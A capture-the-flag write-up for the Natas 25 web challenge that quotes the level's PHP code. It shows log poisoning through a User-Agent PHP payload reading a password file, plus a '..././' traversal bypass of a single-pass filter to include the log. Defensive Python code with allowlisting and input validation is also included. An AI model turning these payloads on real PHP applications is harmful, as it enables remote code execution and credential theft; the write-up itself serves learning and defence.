function logRequest($message){
    $log="[". date("d.m.Y H::i:s",time()) ."]";
    $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
    $log=$log . " \"" . $message ."\"\n";
    $fd=fopen("/tmp/natas25_" . session_id() .".log","a");
    fwrite($fd,$log);
    fclose($fd);
}

The logRequest function lets us append arbitrary content to an arbitrary file path. Why?
1. We control $_SERVER['HTTP_USER_AGENT'] which is the value of the User-Agent HTTP header.
2. We control session_id() through the PHPSESSID cookie value, which is used unchecked in the log file name.
Let's set User-Agent to be the following:
<?php echo file_get_contents('/etc/natas_webpass/natas26') ?>

and the PHPSESSID cookie value to be 'pwned'.
So, what we have done so far: if the logRequest function is called, PHP code that prints the next level's password will be written to the file /tmp/natas25_pwned.log.
The last step is to display the output of this code. We can do it by including the content of /tmp/natas25_pwned.log in the page, by exploiting the following function, which is called on page load:

function setLanguage(){
    /* language setup */
    if(array_key_exists("lang",$_REQUEST))
        if(safeinclude("language/" . $_REQUEST["lang"] ))
            return 1;
    safeinclude("language/en");
}

function safeinclude($filename){
    // check for directory traversal
    if(strstr($filename,"../")){
        logRequest("Directory traversal attempt! fixing request.");
        $filename=str_replace("../","",$filename);
    }
    // dont let ppl steal our passwords
    if(strstr($filename,"natas_webpass")){
        logRequest("Illegal file access detected! Aborting!");
        exit(-1);
    }
    // add more checks...

    if (file_exists($filename)) {
        include($filename);
        return 1;
    }
    return 0;
}
You can see that the safeinclude function makes life hard for us by removing '../'. To bypass it we use the following observation:
str_replace makes a single pass, so '..././' becomes '../' after the inner '../' is removed. Therefore we can use it to escape from the 'language/' directory and include an arbitrary path (/tmp/natas25_pwned.log).
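Both weaknesses in this level come from the same mistake: user input is "cleaned" instead of being validated, and then used to build a file path. The log file name is built from an unchecked session id, the log line from an unescaped header, and the include path from a single-pass str_replace that a doubled '../' survives. The following is an added example for this writeup, not code from the Natas challenge, written in Python so the check logic is language-neutral; the directory paths, the language allowlist and the function names are assumptions. It shows the naive filter collapsing '..././' to '../', and beside it the checks a defender would use instead: an allowlist, a resolved-path prefix check, a strict session id pattern, and neutralisation of log content.

```python
import html
import os
import re
from typing import Optional

# Constructed values for the example; the challenge's real paths are not used.
LANGUAGE_DIR = "/srv/app/language"
LOG_DIR = "/tmp"
ALLOWED_LANGS = {"en", "de"}  # allowlist of language files that may be included

# PHP's default session id alphabet is [a-zA-Z0-9,-]; anything else is rejected.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9,-]{1,128}")


def naive_strip_traversal(filename: str) -> str:
    """Single-pass removal of '../', mirroring the page's safeinclude().
    Each '..././' collapses to '../', so the filter defeats itself."""
    return filename.replace("../", "")


def safe_language_path(lang: str, base_dir: str = LANGUAGE_DIR) -> Optional[str]:
    """Map a client-supplied language name to a file under base_dir.
    Returns None unless the name is allowlisted AND the resolved path stays inside base_dir."""
    if lang not in ALLOWED_LANGS:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, lang))
    # Defence in depth: the allowlist already excludes traversal, but a prefix check
    # on the resolved path catches mistakes if the allowlist is later widened.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_log_path(session_id: str, log_dir: str = LOG_DIR) -> Optional[str]:
    """Build the per-session log path only for a well-formed session id,
    so the cookie can no longer choose the file name."""
    if not SESSION_ID_RE.fullmatch(session_id):
        return None
    return os.path.join(log_dir, f"natas25_{session_id}.log")


def sanitize_log_field(value: str, max_len: int = 256) -> str:
    """Neutralise attacker-controlled text before it reaches a log file:
    no CR/LF (no forged log lines), no raw '<' or '>' (no PHP or HTML tags
    if the log is ever rendered or included), printable ASCII only, bounded length."""
    value = value.replace("\r", " ").replace("\n", " ")
    value = html.escape(value, quote=False)
    value = "".join(ch if 32 <= ord(ch) < 127 else "?" for ch in value)
    return value[:max_len]


if __name__ == "__main__":
    tricky = "..././..././tmp/natas25_pwned.log"
    print("naive filter :", naive_strip_traversal(tricky))   # ../../tmp/natas25_pwned.log
    print("allowlisted  :", safe_language_path("en"))
    print("traversal    :", safe_language_path(tricky))      # None
    print("good session :", safe_log_path("pwned"))          # /tmp/natas25_pwned.log
    print("bad session  :", safe_log_path("../../etc/x"))    # None
    print("sanitized UA :", sanitize_log_field("<?php echo 1 ?>\r\nforged line"))
```

The allowlist is the real fix for the include: with it, no log file is ever a candidate for include(), so what the log contains stops mattering for code execution. The log-side changes are still worth keeping, because a log that accepts raw newlines and tags is a problem for every tool that later reads it.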
We will set lang GET parameter to be:
lang=..././..././..././..././..././tmp/natas25_pwned.log
This triggers the logRequest function, because a directory traversal attempt was detected, so the PHP code from our User-Agent is written to /tmp/natas25_pwned.log; the fixed-up path then points at that same file, which is included and executed.
Pwned ! :)